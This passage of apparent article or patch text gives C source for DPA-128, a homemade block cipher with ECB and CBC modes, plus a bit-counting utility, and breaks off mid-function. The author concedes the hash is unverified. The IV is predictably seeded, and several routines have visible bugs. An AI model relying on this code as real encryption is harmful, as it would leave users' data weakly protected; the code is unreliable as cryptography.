+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* segments.c */
+/*
+ * This is a small utility to count the segments of identical bits in a
+ * file. It could also be rewritten in a sexier way but...
+ *
+ */
+#include <sys/mman.h>
+#include <sys/stat.h>
+
+#include <fcntl.h>
+#include <sysexits.h>
+
+int	main(int argc, char *argv[])
+{
+  int	i;
+  int	fd;
+  int	cnt;
+  int	last;
+  int	biggest;
+  int	size;
+  char	*map;
+  struct stat	sb;
+  unsigned int	STATS[2][32];
+
+  if (argc < 2)
+    return (EX_USAGE);
+
+  /* Initialize the segments counters */
+  for (cnt = 0; cnt < 2; ++cnt)
+    for (i = 0; i < 32; ++i)
+      STATS[cnt][i] = 0;
+
+  /* Open and map the file in memory */
+  fd = open(argv[1], O_RDONLY);
+  if (fd < 0)
+    return (EX_SOFTWARE);
+  fstat(fd, &sb);
+  map = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+  if (map == (void *)MAP_FAILED)
+    return (EX_SOFTWARE);
+
+  last = -1;
+  biggest = 0;
+  size = sb.st_size;
+
+  while (size--)
+    {
+      for (i = 7, cnt = 0; i >= 0; --i, ++cnt)
+	{
+	  if ((*map >> i) & 0x1)
+	    {
+	      if (last == 0)
+		{
+		  if (cnt > biggest)
+		    biggest = cnt;
+		  if (cnt >= 32)
+		    errx(EX_SOFTWARE, "This cannot be an entropy source ;)");
+		  STATS[last][cnt] += 1;
+		  cnt = 0;
+		}
+	      last = 1;
+	    }
+	  else
+	    {
+	      if (last == 1)
+		{
+		  if (cnt > biggest)
+		    biggest = cnt;
+		  if (cnt >= 32)
+		    errx(EX_SOFTWARE, "This cannot be an entropy source ;)");
+		  STATS[last][cnt] += 1;
+		  cnt = 0;
+		}
+	      last = 0;
+	    }
+	}
+      ++map;
+    }
+  munmap(map, sb.st_size);
+
+  printf("0's segments:\n");
+  for (i = 1; i < biggest; i++)
+    printf("\t%d => %d\n", i, STATS[0][i]);
+
+  printf("\n1's segments:\n");
+  for (i = 1; i < biggest; i++)
+    printf("\t%d => %d\n", i, STATS[1][i]);
+
+  return (EX_OK);
+}
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+
+Again, the source code that follows is a work in progress, and some parts
+deserve a cleaner rewrite. data.c is truly ugly ;)
+It was tested on Linux & BSD/i386, SunOS/sparc and OSF1/alpha, if it does
+not run on your unix box, porting it should be trivial.
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+# Makefile
+NAME	=	dpa
+SRCS	=	main.c\
+		bitshift.c\
+		bytechain.c\
+		blockchain.c\
+		E.c\
+		D.c\
+		S_E.c\
+		S_D.c\
+		iv.c\
+		ecb.c\
+		cbc.c\
+		checksum128.c\
+		hash32.c\
+		key.c\
+		data.c\
+		sum.c\
+		usage.c
+
+OBJS	=	$(SRCS:.c=.o)
+
+CFLAGS	=
+
+LDFLAGS	=
+
+$(NAME)	:	$(OBJS)
+	cc -o $(NAME) $(OBJS) $(LDFLAGS)
+
+clean	:
+	rm -f *.o *~
+
+fclean	:	clean
+	rm -f $(NAME)
+
+re	:	fclean	$(NAME)
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* include/dpa.h */
+#ifndef	_DPA_H_
+#define	_DPA_H_
+
+#define	DPA_KEY_SIZE	16
+#define	DPA_BLOCK_SIZE	16
+
+#define	DPA_ENCRYPT	0
+#define	DPA_DECRYPT	1
+
+#define	DPA_MODE_ECB	0
+#define	DPA_MODE_CBC	1
+
+struct s_dpa_sub_key {
+  unsigned char	key[DPA_KEY_SIZE];
+  unsigned char	shift;
+};
+typedef struct s_dpa_sub_key	DPA_SUB_KEY;
+
+struct s_dpa_key {
+  struct s_dpa_sub_key	subkey[16];
+};
+typedef struct s_dpa_key	DPA_KEY;
+
+struct s_dpa_data {
+  unsigned char	*data;
+  unsigned long	length;
+};
+typedef struct s_dpa_data	DPA_DATA;
+
+
+void		checksum128(unsigned char *, unsigned char *, unsigned int);
+unsigned long	hash32(unsigned char *, unsigned int);
+
+unsigned char	dpa_encrypt(unsigned int, unsigned int, unsigned int);
+unsigned char	dpa_decrypt(unsigned int, unsigned int, unsigned int);
+
+void	DPA_ecb_encrypt(DPA_KEY *, DPA_DATA *, DPA_DATA *);
+void	DPA_ecb_decrypt(DPA_KEY *, DPA_DATA *, DPA_DATA *);
+
+void	DPA_cbc_encrypt(DPA_KEY *, DPA_DATA *, DPA_DATA *);
+void	DPA_cbc_decrypt(DPA_KEY *, DPA_DATA *, DPA_DATA *);
+
+void	DPA_sum(DPA_KEY *, DPA_DATA *, DPA_DATA *);
+
+void	DPA_set_key(DPA_KEY *, unsigned char *, unsigned int);
+void	DPA_set_keyfile(DPA_KEY *, char *);
+void	DPA_set_data(DPA_DATA *, unsigned char *, unsigned int);
+void	DPA_set_datafile(DPA_DATA *, char *);
+void	DPA_set_ciphertext(DPA_DATA *, DPA_DATA *, int, int);
+void	DPA_write_to_file(DPA_DATA *, char *);
+void	DPA_sum_write_to_file(DPA_DATA *, char *);
+
+void	rbytechain(unsigned char *);
+void	lbytechain(unsigned char *);
+
+void	rbitshift(unsigned char *, unsigned int);
+void	lbitshift(unsigned char *, unsigned int);
+
+void	blockchain(unsigned char *, unsigned char *);
+
+void	IV(unsigned char *);
+
+void	E(unsigned char *, unsigned char *, unsigned int);
+void	D(unsigned char *, unsigned char *, unsigned int);
+void	S_E(unsigned char *, unsigned char *, unsigned int);
+void	S_D(unsigned char *, unsigned char *, unsigned int);
+
+void	usage(void);
+
+#endif
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* checksum128.c */
+/* NEEDS_FIX */
+/*
+ * This function creates a 128 bits (16 bytes) checksum out of a variable
+ * length input. It has NOT been verified so it is most likely broken and
+ * subject to collisions even though I was not able to find any myself.
+ *
+ * The following constraints need to be respected:
+ * - the function has to return a 128 bits value no matter what;
+ * - it should be difficult to determine the result by knowing the input;
+ * - it should be difficult to determine the input by knowing the result;
+ * - it should be difficult to find an input that will produce an identic
+ *   result as a known input;
+ * - it should be difficult to find two inputs that will produce the same
+ *   result;
+ * - it should be easy to compute the result of an input;
+ *
+ * If checksum128() happens to be broken, DPA-128 could be fixed by
+ * replacing it with any one-way hash function that produces a 128 bits
+ * output (MD5 comes to mind first ;).
+ */
+
+#define	__NBROUNDS	32
+void	checksum128(unsigned char *key, unsigned char *skey, unsigned int size)
+{
+  unsigned int	cnt;
+  unsigned int	length;
+  unsigned long	a;
+  unsigned long	b;
+  unsigned long	c;
+  unsigned long	d;
+  unsigned char	*save;
+
+  /* Initialization of contexts */
+  a = 0xdeadbeef;
+  b = 0xadbeefde;
+  c = 0xbeefdead;
+  d = 0xefdeadbe;
+
+  for (cnt = 0; cnt < __NBROUNDS; ++cnt)
+    {
+      for (length = 0, save = key; length < size; ++save, ++length)
+	{
+	  /* each context is first summed up with the cumplement of
+	   * the current ascii character.
+	   */
+	  a = (a + ~(*save));
+	  b = (b + ~(*save));
+	  c = (c + ~(*save));
+	  d = (d + ~(*save));
+
+	  /* Confusion */
+	  /*
+	   * Context A is summed with the product of:
+	   * - cumplement of B, C and cumplement of D;
+	   *
+	   * Context B is summed with the product of:
+	   * - cumplement of C, D and cumplement of A;
+	   *
+	   * Context C is summed with the product of:
+	   * - cumplement of D, A and cumplement of B;
+	   *
+	   * Context D is summed with the product of:
+	   * - cumplement of A, B and cumplement of C;
+	   *
+	   * Every context has a repercussion on all others
+	   * including itself, and multiplication makes it
+	   * hard to determine the previous values of each
+	   * contexts after a few rounds.
+	   */
+	  a += ~b * c * ~d;
+	  b += ~c * d * ~a;
+	  c += ~d * a * ~b;
+	  d += ~a * b * ~c;
+	}
+
+      /* Diffusion */
+      /*
+       * The bytes of each contexts are shuffled within the
+       * same context, the first byte of A becomes the last
+       * which becomes the first. the second becomes the
+       * third which becomes the second. This permutation
+       * is also applied to B, C and D, just before they go
+       * through another round.
+       */
+      a = (((a & 0x000000ff) << 24) +
+	   ((a & 0x0000ff00) << 8) +
+	   ((a & 0x00ff0000) >> 8) +
+	   ((a & 0xff000000) >> 24));
+      b = (((b & 0x000000ff) << 24) +
+	   ((b & 0x0000ff00) << 8) +
+	   ((b & 0x00ff0000) >> 8) +
+	   ((b & 0xff000000) >> 24));
+      c = (((c & 0x000000ff) << 24) +
+	   ((c & 0x0000ff00) << 8) +
+	   ((c & 0x00ff0000) >> 8) +
+	   ((c & 0xff000000) >> 24));
+      d = (((d & 0x000000ff) << 24) +
+	   ((d & 0x0000ff00) << 8) +
+	   ((d & 0x00ff0000) >> 8) +
+	   ((d & 0xff000000) >> 24));
+    }
+
+  /* Diffusion */
+  /*
+   * The Checksum is constructed by taking respectively
+   * the first byte of A, B, C and D, then the second,
+   * the third and the fourth.
+   */
+  skey[0] = (a & 0xff000000) >> 24;
+  skey[1] = (b & 0xff000000) >> 24;
+  skey[2] = (c & 0xff000000) >> 24;
+  skey[3] = (d & 0xff000000) >> 24;
+  skey[4] = (a & 0x00ff0000) >> 16;
+  skey[5] = (b & 0x00ff0000) >> 16;
+  skey[6] = (c & 0x00ff0000) >> 16;
+  skey[7] = (d & 0x00ff0000) >> 16;
+  skey[8]  = (a & 0x0000ff00) >> 8;
+  skey[9]  = (b & 0x0000ff00) >> 8;
+  skey[10] = (c & 0x0000ff00) >> 8;
+  skey[11] = (d & 0x0000ff00) >> 8;
+  skey[12] = (a & 0x000000ff);
+  skey[13] = (b & 0x000000ff);
+  skey[14] = (c & 0x000000ff);
+  skey[15] = (d & 0x000000ff);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* hash32.c */
+/*
+ * This function computes a 32 bits output out a variable length input. It is
+ * not important to have a nice distribution and low collisions as it is used
+ * on the output of checksum128() (see checksum128.c). There is a requirement
+ * though, the function should not consider \0 as a key terminator.
+ */
+unsigned long	hash32(unsigned char *k, unsigned int length)
+{
+  unsigned long	h;
+
+  for (h = 0; *k && length; ++k, --length)
+    h = 13 * h + *k;
+  return (h);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* bytechain.c */
+
+#include "include/dpa.h"
+
+void	rbytechain(unsigned char *block)
+{
+  int	i;
+
+  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+    block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
+  return;
+}
+
+void	lbytechain(unsigned char *block)
+{
+  int	i;
+
+  for (i = DPA_BLOCK_SIZE - 1; i >= 0; --i)
+    block[i] ^= block[(i + 1) % DPA_BLOCK_SIZE];
+  return;
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* bitshift.c */
+#include <string.h>
+
+#include "include/dpa.h"
+
+void	rbitshift(unsigned char *block, unsigned int shift)
+{
+  unsigned int	i;
+  unsigned int	div;
+  unsigned int	mod;
+  unsigned int	rel;
+  unsigned char	mask;
+  unsigned char	remainder;
+  unsigned char	sblock[DPA_BLOCK_SIZE];
+
+  if (shift)
+    {
+      mask = 0;
+      shift %= 128;
+      div = shift / 8;
+      mod = shift % 8;
+      rel = DPA_BLOCK_SIZE - div;
+      for (i = 0; i < mod; ++i)
+	mask |= (1 << i);
+      for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+	{
+	  remainder =
+	    ((block[(rel + i - 1) % DPA_BLOCK_SIZE]) & mask) << (8 - mod);
+	  sblock[i] = ((block[(rel + i) % DPA_BLOCK_SIZE]) >> mod) | remainder;
+	}
+    }
+  memcpy(block, sblock, DPA_BLOCK_SIZE);
+}
+
+void	lbitshift(unsigned char *block, unsigned int shift)
+{
+  int	i;
+  unsigned int	div;
+  unsigned int	mod;
+  unsigned int	rel;
+  unsigned char	mask;
+  unsigned char	remainder;
+  unsigned char	sblock[DPA_BLOCK_SIZE];
+
+  if (shift)
+    {
+      mask = 0;
+      shift %= 128;
+      div = shift / 8;
+      mod = shift % 8;
+      rel = DPA_BLOCK_SIZE + div;
+      for (i = 0; i < (8 - mod); ++i)
+	mask |= (1 << i);
+      mask = ~mask;
+      for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+	{
+	  remainder =
+	    (block[(rel + i + 1) % DPA_BLOCK_SIZE] & mask) >> (8 - mod);
+	  sblock[i] =
+	    ((block[(rel + i) % DPA_BLOCK_SIZE]) << mod) | remainder;
+	}
+    }
+  memcpy(block, sblock, DPA_BLOCK_SIZE);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* S_E.c */
+#include "include/dpa.h"
+
+/*
+ * The substitution table looks like this:
+ *
+ * (s+0)%256 (s+1)%256 (s+2)%256 (s+3)%256 (s+4)%256 (s+5)%256 (s+6)%256 ...
+ * (s+1)%256 (s+2)%256 (s+3)%256 (s+4)%256 (s+5)%256 (s+6)%256 (s+7)%256 ...
+ * (s+2)%256 (s+3)%256 (s+4)%256 (s+5)%256 (s+6)%256 (s+7)%256 (s+8)%256 ...
+ * (s+3)%256 (s+4)%256 (s+5)%256 (s+6)%256 (s+7)%256 (s+8)%256 (s+9)%256 ...
+ * (s+4)%256 (s+5)%256 (s+6)%256 (s+7)%256 ...
+ * (s+5)%256 (s+6)%256 (s+7)%256 (s+8)%256 ...
+ * (s+6)%256 (s+7)%256 (s+8)%256 (s+9)%256 ...
+ * ...
+ */
+void	S_E(unsigned char *key, unsigned char *block, unsigned int s)
+{
+  int	i;
+
+  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+    block[i] = (key[i] + block[i] + s) % 256;
+  return;
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* S_D.c */
+#include "include/dpa.h"
+
+void	S_D(unsigned char *key, unsigned char *block, unsigned int s)
+{
+  int	i;
+
+  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+    block[i] = ((256 + block[i]) - key[i] - s) % 256;
+  return;
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* E.c */
+#include "include/dpa.h"
+
+/* This is the function that is iterated at each round to encrypt */
+void    E(unsigned char *key, unsigned char *block, unsigned int shift)
+{
+  rbytechain(block);
+  rbitshift(block, shift);
+  S_E(key, block, shift);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* D.c */
+#include "include/dpa.h"
+
+/* This is the function used to decrypt */
+void	D(unsigned char *key, unsigned char *block, unsigned int shift)
+{
+  S_D(key, block, shift);
+  lbitshift(block, shift);
+  lbytechain(block);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* blockchain.c */
+#include "include/dpa.h"
+
+/* Block chaining for BC modes */
+void    blockchain(unsigned char *dst, unsigned char *src)
+{
+  int   i;
+
+  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+    dst[i] = dst[i] ^ src[i];
+  return;
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* iv.c */
+#include <stdlib.h>
+#include <time.h>
+#include <unistd.h>
+
+#include "include/dpa.h"
+
+/* Initialization vector */
+void    IV(unsigned char *block)
+{
+  int   i;
+
+  srandom(time(NULL) % getpid());
+  for (i = 0; i < DPA_BLOCK_SIZE; ++i)
+    block[i] = random();
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* key.c */
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+
+#include "include/dpa.h"
+
+/* This is the function used to precompute the subkeys */
+void	DPA_set_key(DPA_KEY *k, unsigned char *key, unsigned int len)
+{
+  /* Compute subkey #0 */
+  checksum128(key, k->subkey[0].key, len);
+
+  /* Compute subkey #1 -> #15: k.n = H(k.(n-1)%16), where 0 <= n <= 15 */
+  checksum128(k->subkey[0].key, k->subkey[1].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[1].key, k->subkey[2].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[2].key, k->subkey[3].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[3].key, k->subkey[4].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[4].key, k->subkey[5].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[5].key, k->subkey[6].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[6].key, k->subkey[7].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[7].key, k->subkey[8].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[8].key, k->subkey[9].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[9].key, k->subkey[10].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[10].key, k->subkey[11].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[11].key, k->subkey[12].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[12].key, k->subkey[13].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[13].key, k->subkey[14].key, DPA_KEY_SIZE);
+  checksum128(k->subkey[14].key, k->subkey[15].key, DPA_KEY_SIZE);
+
+  /* Paranoia: overwrite subkey #0 to prevent a possible biais in H
+   * from revealing informations about the initial key.
+   */
+  checksum128(k->subkey[15].key, k->subkey[0].key, DPA_KEY_SIZE);
+
+
+  /* Compute shifts. Shifts are inverted to break a possible relation
+   * between shiftings and subkeys. The last subkey is used to compute
+   * the first shift, and so on...
+   */
+  k->subkey[0].shift = hash32(k->subkey[15].key, DPA_KEY_SIZE);
+  k->subkey[1].shift = hash32(k->subkey[14].key, DPA_KEY_SIZE);
+  k->subkey[2].shift = hash32(k->subkey[13].key, DPA_KEY_SIZE);
+  k->subkey[3].shift = hash32(k->subkey[12].key, DPA_KEY_SIZE);
+  k->subkey[4].shift = hash32(k->subkey[11].key, DPA_KEY_SIZE);
+  k->subkey[5].shift = hash32(k->subkey[10].key, DPA_KEY_SIZE);
+  k->subkey[6].shift = hash32(k->subkey[9].key, DPA_KEY_SIZE);
+  k->subkey[7].shift = hash32(k->subkey[8].key, DPA_KEY_SIZE);
+  k->subkey[8].shift = hash32(k->subkey[7].key, DPA_KEY_SIZE);
+  k->subkey[9].shift = hash32(k->subkey[6].key, DPA_KEY_SIZE);
+  k->subkey[10].shift = hash32(k->subkey[5].key, DPA_KEY_SIZE);
+  k->subkey[11].shift = hash32(k->subkey[4].key, DPA_KEY_SIZE);
+  k->subkey[12].shift = hash32(k->subkey[3].key, DPA_KEY_SIZE);
+  k->subkey[13].shift = hash32(k->subkey[2].key, DPA_KEY_SIZE);
+  k->subkey[14].shift = hash32(k->subkey[1].key, DPA_KEY_SIZE);
+  k->subkey[15].shift = hash32(k->subkey[0].key, DPA_KEY_SIZE);
+}
+
+/* And this one for using a file as a secret key */
+void	DPA_set_keyfile(DPA_KEY *k, char *filename)
+{
+  int	fd;
+  void	*key;
+  struct stat	sb;
+
+  fd = open(filename, O_RDONLY);
+  if (fd < 0)
+    {
+      fprintf(stderr, "failed to open %s as a secret key.\n", filename);
+      exit(1);
+    }
+  fstat(fd, &sb);
+  key =
+    (unsigned char *)mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+  if (key == (void *)MAP_FAILED)
+    {
+      fprintf(stderr, "mmap() call failure.\n");
+      exit(1);
+    }
+  DPA_set_key(k, key, sb.st_size);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* data.c */
+/*
+ * Warning: ugliest file ;)
+ */
+#include <sys/types.h>
+#include <sys/mman.h>
+#include <sys/stat.h>
+
+#include <fcntl.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <unistd.h>
+
+#include "include/dpa.h"
+
+void	DPA_set_data(DPA_DATA *d, unsigned char *data, unsigned int len)
+{
+  d->data = data;
+  d->length = len;
+}
+
+void	DPA_set_datafile(DPA_DATA *d, char *filename)
+{
+  int	fd;
+  struct stat	sb;
+
+  fd = open(filename, O_RDONLY);
+  if (fd < 0)
+    {
+      fprintf(stderr, "failed to open data file %s.\n", filename);
+      exit(1);
+    }
+  fstat(fd, &sb);
+  d->data =
+    (unsigned char *)mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);
+  if (d->data == (void *)MAP_FAILED)
+    {
+      fprintf(stderr, "mmap() call failure.\n");
+      exit(1);
+    }
+  d->length = sb.st_size;
+}
+
+/* Allocate enough memory to hold the result of encryption/decryption */
+void	DPA_set_ciphertext(DPA_DATA *d, DPA_DATA *c, int mode, int action)
+{
+  int	sz;
+
+  sz = 0;
+  if (action == DPA_ENCRYPT)
+    {
+      if (mode == DPA_MODE_ECB)
+	{
+          if ((d->length % DPA_BLOCK_SIZE) == 0)
+            sz = d->length + DPA_BLOCK_SIZE;
+	  else
+            sz = d->length + (DPA_BLOCK_SIZE - (d->length % DPA_BLOCK_SIZE)) +
+	      DPA_BLOCK_SIZE;
+        }
+      else if (mode == DPA_MODE_CBC)
+	{
+	  if ((d->length % DPA_BLOCK_SIZE) == 0)
+	    sz = d->length + (DPA_BLOCK_SIZE * 2);
+	  else
+	    sz = d->length + (DPA_BLOCK_SIZE - (d->length % DPA_BLOCK_SIZE)) +
+	      (DPA_BLOCK_SIZE * 2);
+	}
+    }
+  else if (action == DPA_DECRYPT)
+    {
+      if (mode == DPA_MODE_ECB)
+	sz = d->length - DPA_BLOCK_SIZE;
+      else if (mode == DPA_MODE_CBC)
+	sz = d->length - (DPA_BLOCK_SIZE * 2);
+    }
+  c->data =
+(unsigned char *)mmap(NULL, sz,
+                      PROT_READ|PROT_WRITE, MAP_ANON|MAP_PRIVATE, -1, 0);
+  if (c->data == (void *)MAP_FAILED)
+    {
+      fprintf(stderr, "mmap() call failure.\n");
+      exit(1);
+    }
+  c->length = sz;
+}
+
+/* Write the result of encryption/decryption to filename */
+void	DPA_write_to_file(DPA_DATA *data, char *filename)
+{
+  int	fd;
+  int	cnt;
+  int	wasfile;
+
+  wasfile = 0;
+  if (!strcmp(filename, "-"))
+    fd = 1;
+  else
+    {
+      fd = open(filename, O_RDWR|O_CREAT|O_TRUNC, 0600);
+      if (fd < 0)
+	{
+          fprintf(stderr, "failed to open result file %s.\n", filename);
+          exit(1);
+        }
+      wasfile = 1;
+    }
+
+  for (cnt = 0; cnt < data->length;)
+    if ((data->length - cnt) < DPA_BLOCK_SIZE)
+      cnt += write(fd, data->data + cnt, data->length - cnt);
+    else
+      cnt += write(fd, data->data + cnt, DPA_BLOCK_SIZE);
+
+  if (wasfile)
+    close(fd);
+}
+
+/* Write the result of checksum to filename in base 16 */
+void	DPA_sum_write_to_file(DPA_DATA *data, char *filename)
+{
+  int	fd;
+  int	cnt;
+  int	cnt2;
+  int	wasfile;
+  unsigned char	base[] = "0123456789abcdef";
+  unsigned char	buffer[DPA_BLOCK_SIZE * 2 + 2];
+
+  wasfile = 0;
+  if (!strcmp(filename, "-"))
+    fd = 1;
+  else
+    {
+      fd = open(filename, O_RDWR|O_CREAT|O_TRUNC, 0600);
+      if (fd < 0)
+        {
+          fprintf(stderr, "failed to open result file %s.\n", filename);
+	  exit(1);
+        }
+      wasfile = 1;
+    }
+
+  for (cnt = cnt2 = 0; cnt < DPA_BLOCK_SIZE; ++cnt, (cnt2 += 2))
+    {
+      buffer[cnt2] =
+	base[*(data->data + data->length - DPA_BLOCK_SIZE + cnt) / 16];
+      buffer[cnt2 + 1] =
+	base[*(data->data + data->length - DPA_BLOCK_SIZE + cnt) % 16];
+    }
+  buffer[DPA_BLOCK_SIZE * 2] = '\n';
+  buffer[DPA_BLOCK_SIZE * 2 + 1] = '\0';
+
+  write(fd, buffer, DPA_BLOCK_SIZE * 2 + 2);
+
+  if (wasfile)
+    close(fd);
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* ecb.c */
+/*
+ * Encryption/Decryption in ECB mode.
+ */
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+#include "include/dpa.h"
+
+/* XXX - for better performances, unroll the loops ;) */
+
+void	DPA_ecb_encrypt(DPA_KEY *key, DPA_DATA *data, DPA_DATA *cipher)
+{
+  int	j;
+  int	cnt;
+  unsigned char	*cptr;
+  unsigned char	block[DPA_BLOCK_SIZE];
+
+  cnt = data->length;
+  cptr = cipher->data;
+  memset(block, 0, 16);
+  for (; cnt > 0; data->data += DPA_BLOCK_SIZE, cptr += DPA_BLOCK_SIZE)
+    {
+      if (cnt < DPA_BLOCK_SIZE)
+	{
+	  memcpy(block, data->data, cnt);
+	  memset(block + cnt, 0, DPA_BLOCK_SIZE - cnt);
+	}
+      else
+	memcpy(block, data->data, DPA_BLOCK_SIZE);
+      for (j = 0; j < 16; ++j)
+	E(key->subkey[j].key, block, key->subkey[j].shift);
+      memcpy(cptr, block, DPA_BLOCK_SIZE);
+      cnt -= DPA_BLOCK_SIZE;
+    }
+
+  /* Padding block */
+  memset(block, 0, DPA_BLOCK_SIZE);
+  if (data->length % DPA_BLOCK_SIZE)
+    block[DPA_BLOCK_SIZE - 1] = DPA_BLOCK_SIZE - data->length % DPA_BLOCK_SIZE;
+  for (j = 0; j < 16; ++j)
+    E(key->subkey[j].key, block, key->subkey[j].shift);
+  memcpy(cptr, block, DPA_BLOCK_SIZE);
+}
+
+void	DPA_ecb_decrypt(DPA_KEY *key, DPA_DATA *data, DPA_DATA *cipher)
+{
+  int	j;
+  int	cnt;
+  unsigned char	padding;
+  unsigned char	*cptr;
+  unsigned char	block[DPA_BLOCK_SIZE];
+
+  /* Data is padded so... we got at least 2 * DPA_BLOCK_SIZE bytes and
+   * data->length / DPA_BLOCK_SIZE should be even
+   */
+  if ((data->length % DPA_BLOCK_SIZE) || data->length < (2 * DPA_BLOCK_SIZE))
+    exit(1);
+  
+  /* Extract padding information */
+  memcpy(block, data->data + data->length - DPA_BLOCK_SIZE, DPA_BLOCK_SIZE);
+  for (j = 15; j >= 0; --j)
+    D(key->subkey[j].key, block, key->subkey[j].shift);
+  padding = block[DPA_BLOCK_SIZE - 1];
+  cipher->length -= padding;
+  
+  cptr = cipher->data;
+  cnt = data->length - DPA_BLOCK_SIZE;
+  memset(block, 0, DPA_BLOCK_SIZE);
+  for (;
+       cnt > 0;
+       cnt -= DPA_BLOCK_SIZE, data->data += DPA_BLOCK_SIZE,
+	 cptr += DPA_BLOCK_SIZE)
+    {
+      memcpy(block, data->data, DPA_BLOCK_SIZE);
+      for (j = 15; j >= 0; --j)
+	D(key->subkey[j].key, block, key->subkey[j].shift);
+      if (cnt >= DPA_BLOCK_SIZE)
+	memcpy(cptr, block, DPA_BLOCK_SIZE);
+      else
+	memcpy(cptr, block, DPA_BLOCK_SIZE - (padding % DPA_BLOCK_SIZE));
+    }
+}
+
+
+8<- - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 8< - - - - - 
+/* cbc.c */
+/*
+ * Encryption/Decryption in CBC mode.
+ */
+#include <stdio.h>
+#include <string.h>
+#include <unistd.h>
+
+#include "include/dpa.h"
+
+/* XXX - for better performances, unroll the loops ;) */
+void	DPA_cbc_encrypt(DPA_KEY *key, DPA_DATA *data, DPA_DATA *cipher)
+{
+  int	j;
+  int	cnt;
+  unsigned char	*cptr;
+  unsigned char	block[DPA_BLOCK_SIZE];
+  unsigned char	iv[DPA_BLOCK_SIZE];
+  unsigned char	xblock[DPA_BLOCK_SIZE];
+
+  /* IV */
+  cptr = cipher->data;
+  IV(iv);
+  memcpy(xblock, iv, DPA_BLOCK_SIZE);
+  for (j = 0; j < 16; ++j)
+    E(key->subkey[j].key, iv, key->subkey[j].shift);
+  memcpy(cptr, iv, DPA_BLOCK_SIZE);
+  cptr += DPA_BLOCK_SIZE;
+
+  cnt = data->length;
+  memset(block, 0, 16);
+  for (; cnt > 0; data->data += DPA_BLOCK_SIZE, cptr += DPA_BLOCK_SIZE)
+    {
+      if (cnt < DPA_BLOCK_SIZE)
+	{
+	  memcpy(block, data->data, cnt);
+	  memset(block + cnt, 0, DPA_BLOCK_SIZE - cnt);
+	}
+      else
+	memcpy(block, data->data, DPA_BLOCK_SIZE);
+      
+      blockchain(block, xblock);
+      for (j = 0; j < 16; ++j)
+	E(key->subkey[j].key, block, key->subkey[j].shift);
+      memcpy(xblock, block, DPA_BLOCK_SIZE);
+      memcpy(cptr, block, DPA_BLOCK_SIZE);
+      cnt -= DPA_BLOCK_SIZE;
+    }
+
+  /* Padding */
+  memset(block, 0, DPA_BLOCK_SIZE);
+  if (data->length % DPA_BLOCK_SIZE)
+    block[DPA_BLOCK_SIZE - 1] = DPA_BLOCK_SIZE - data->length % DPA_BLOCK_SIZE;
+  blockchain(block, xblock);
+  for (j = 0; j < 16; ++j)
+    E(key->subkey[j].key, block, key->subkey[j].shift);
+  memcpy(cptr, block, DPA_BLOCK_SIZE);
+}
+
+
+void	DPA_cbc_decrypt(DPA_KEY *key, DPA_DATA *data, DPA_DATA *cipher)
+{
+  int	j;
+  int	cnt;
+  unsigned char	padding;
+  unsigned char	*cptr;
+  unsigned char	block[DPA_BLOCK_SIZE];
+  unsigned char	xblock[DPA_BLOCK_SIZE];
+  unsigned char	xblockprev[DPA_BLOCK_SIZE];
+  unsigned char	*xorptr;
+
+  /*
